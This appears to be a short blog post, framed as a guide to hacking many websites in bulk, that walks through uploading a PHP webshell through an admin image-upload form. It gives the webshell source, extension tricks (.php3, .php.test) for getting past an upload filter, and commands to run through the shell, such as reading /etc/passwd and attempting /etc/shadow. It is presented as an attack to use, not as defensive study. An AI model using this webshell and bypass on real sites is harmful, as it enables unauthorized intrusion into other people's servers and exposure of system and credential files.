11:08 PM
Hemanth Joseph
How To Hack A Lot Of Websites In A Bulk - By Uploading a shell and Executing codes .
Once access to the administration page is obtained, the next goal is to find a way to
execute commands on the operating system.
We can see that there is a file upload function allowing a user to upload a picture, we
can use this functionality to try to upload a PHP script. This PHP script once uploaded
on the server will give us a way to run PHP code and commands.
First we need to create a PHP script to run commands. Below is the source code of a
simple and minimal webshell:
<?php
system($_GET['cmd']);
?>
This script takes the content of the parameter cmd and executes it. It needs to be
saved as a file with the extension .php, for example: shell.php can be used as a
filename.
We can now use the upload functionality available at the page:
http://vulnerable/admin/new.php and try to upload this script.
We can see that the script has not been uploaded correctly on the server. The
application prevent file with an extension .php to be uploaded. We can however try:
.php3 which will bypass a simple filter on .php
.php.test which will bypass a simple filter on .php and Apache will
still use .php since in this configuration it doesn't have an handler for
.test
Now, we need to find where the PHP script, managing the upload put the file on the
web server. We need to ensure that the file is directly available for web clients. We
can visit the web page of the newly uploaded image to see where the <img tag is
pointing to:
<div class="content">
<h2 class="title">Last picture: Test shell</h2>
<div class="inner" align="center">
<p>
<img src="admin/uploads/shell.php3" alt="Test shell" /> </p>
</div>
</div>
you can now access the page at the following address and start running commands
using the cmd parameter. For example, accessing
http://vulnerable/admin/uploads/shell.php3?cmd=uname will run the command uname on
the operating system and return the current kernel (Linux).
Other commands can be used to retrieve more information:
cat /etc/passwd to get a full list of the system's users;
uname -a to get the version of the current kernel;
ls to get the content of the current directory;
...
The webshell has the same privileges as the web server running the PHP script, you
won't for example be able to retrieve the content of the file /etc/shadow since the
web server doesn't have access to this file (however you should still try in case an
administrator made a mistake and changed the permissions on this file).
Each command is run in a brand new context independently of the previous command,
you won't be able to get the contents of the /etc/ directory by running cd /etc and
ls, since the second command will be in a new context. To get the contents of the
directory /etc/, you will need to run ls /etc for example. .............
ThanQ For Reading !
Posted in: Kali
0 comments:
Post a Comment